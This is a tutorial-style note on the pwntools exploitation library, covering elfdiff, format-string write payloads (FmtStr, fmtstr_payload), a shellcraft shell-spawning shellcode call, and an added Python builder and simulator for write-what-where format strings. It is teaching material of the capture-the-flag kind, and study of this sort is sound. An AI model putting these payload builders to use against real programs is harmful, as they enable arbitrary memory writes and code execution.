# pwntools

Related documentation:

- http://brieflyx.me/2015/python-module/pwntools-intro/
- [pdf document](https://media.readthedocs.org/pdf/pwntools/stable/pwntools.pdf)

## elfdiff

`elfdiff A B` is used like vimdiff: just give it the two files to compare.

## Format String

### FmtStr

```python
from pwn import *

p = process('./target')  # assumed: a tube to the vulnerable program

# Function called in order to send a payload
def send_payload(payload):
    log.info("payload = %s" % repr(payload))
    p.sendline(payload)
    return p.recv()

# Create a FmtStr object and hand it the function
format_string = FmtStr(execute_fmt=send_payload)
format_string.write(0x0, 0x1337babe)  # write 0x1337babe at 0x0
format_string.write(0x1337babe, 0x0)  # write 0x0 at 0x1337babe
format_string.execute_writes()
```

`execute_writes` builds the payload for the queued writes and passes it to the `execute_fmt` function you supplied.

### fmtstr_payload

```python
>>> fmtstr_payload(6, {0x08048000: 0x10203040})
'\x00\x80\x04\x08\x01\x80\x04\x08\x02\x80\x04\x08\x03\x80\x04\x08%48c%6$hhn%240c%7$hhn%240c%8$hhn%240c%9$hhn'
```

Read the payload in two parts: the four little-endian addresses `0x08048000..0x08048003` occupy stack slots 6 to 9, and each `%Nc%K$hhn` pair pads the character count so that its low byte equals the byte to be written (0x40, 0x30, 0x20, 0x10) before `%hhn` stores it.

`fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')`

- `offset`: the positional argument index at which your input appears on the stack
- `writes`: a dict of `{address: value}`
- `numbwritten`: the number of characters printf has already output before your payload (it shifts every pad count)
- `write_size`: how much to write per specifier (`byte`: `hhn`, `short`: `hn`, `int`: `n`)

Caveat: the address `0x08048000` contains a null byte, which would terminate a real format string; the example output above illustrates the arithmetic only. For such addresses the addresses have to come after the specifiers (with `offset` adjusted accordingly).

## shellcraft

```python
shellcraft.i386.linux.sh()
```
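Returning to the `fmtstr_payload` section: the following is an added, dependency-free re-implementation of the arithmetic behind that helper together with a small printf counter model, so the output shown above can be reproduced and checked offline. It is illustrative code written for this page, not pwntools' own implementation; it assumes a 32-bit target with 4-byte stack slots, addresses placed in front of the specifiers (as in the page's output), and it ignores the null-byte problem noted above. The function names `build_fmtstr_payload`, `simulate_printf` and `read_u32` are this example's own.

```python
"""Added example (not pwntools code): byte/short/int write-what-where
format strings for a 32-bit printf, plus a counter model to verify them."""
import re
import struct

# write_size -> (bytes stored per specifier, length modifier, modulus of the stored count)
WRITE_SIZES = {
    'byte':  (1, b'hhn', 0x100),
    'short': (2, b'hn',  0x10000),
    'int':   (4, b'n',   0x100000000),
}


def build_fmtstr_payload(offset, writes, numbwritten=0, write_size='byte'):
    """Return a format string that writes each {address: value} in `writes`.

    offset      -- positional argument index where our buffer starts on the stack
    numbwritten -- characters printf has already emitted before our buffer
    """
    unit, modifier, modulus = WRITE_SIZES[write_size]
    # Split every 32-bit value into little-endian chunks of `unit` bytes.
    chunks = []
    for addr, value in sorted(writes.items()):
        for i in range(0, 4, unit):
            chunks.append((addr + i, (value >> (8 * i)) & (modulus - 1)))
    # Addresses go first, one 4-byte stack slot each: slot offset+k holds chunks[k].
    addrs = b''.join(struct.pack('<I', addr) for addr, _ in chunks)
    # The address bytes are echoed by printf, so they count as already written.
    written = numbwritten + len(addrs)
    fmt = b''
    for k, (_, target) in enumerate(chunks):
        # Pad with %Nc until the running count equals target modulo the write size.
        pad = (target - written) % modulus
        if pad:
            fmt += b'%%%dc' % pad
        fmt += b'%%%d$%s' % (offset + k, modifier)
        written += pad
    return addrs + fmt


def simulate_printf(payload, offset, numbwritten=0):
    """Model printf's character counter over `payload`; return {addr: byte} written by %n."""
    memory = {}
    count = numbwritten
    pos = 0
    token = re.compile(rb'%(\d+)c|%(\d+)\$(hhn|hn|n)')
    while pos < len(payload):
        m = token.match(payload, pos)
        if m is None:
            count += 1  # a literal byte is echoed and therefore counted
            pos += 1
            continue
        pos = m.end()
        if m.group(1):
            count += int(m.group(1))  # %Nc emits N characters
            continue
        # %K$hhn: the K-th argument is the address we placed at slot K-offset.
        slot = int(m.group(2)) - offset
        addr = struct.unpack_from('<I', payload, slot * 4)[0]
        unit = {b'hhn': 1, b'hn': 2, b'n': 4}[m.group(3)]
        for i in range(unit):
            memory[addr + i] = (count >> (8 * i)) & 0xff
    return memory


def read_u32(memory, addr):
    """Read a little-endian 32-bit value from the simulated memory (unwritten bytes read as 0)."""
    return struct.unpack('<I', bytes(memory.get(addr + i, 0) for i in range(4)))[0]


if __name__ == '__main__':
    payload = build_fmtstr_payload(6, {0x08048000: 0x10203040})
    print(payload)
    print(hex(read_u32(simulate_printf(payload, 6), 0x08048000)))
```

Running it reproduces the page's payload byte for byte, and the counter model confirms that the four `%hhn` stores leave `0x10203040` at `0x08048000`. Switching to `write_size='short'` halves the number of stack slots and specifiers at the cost of much larger `%Nc` padding, which is the usual trade-off when stdout is slow or the buffer is short.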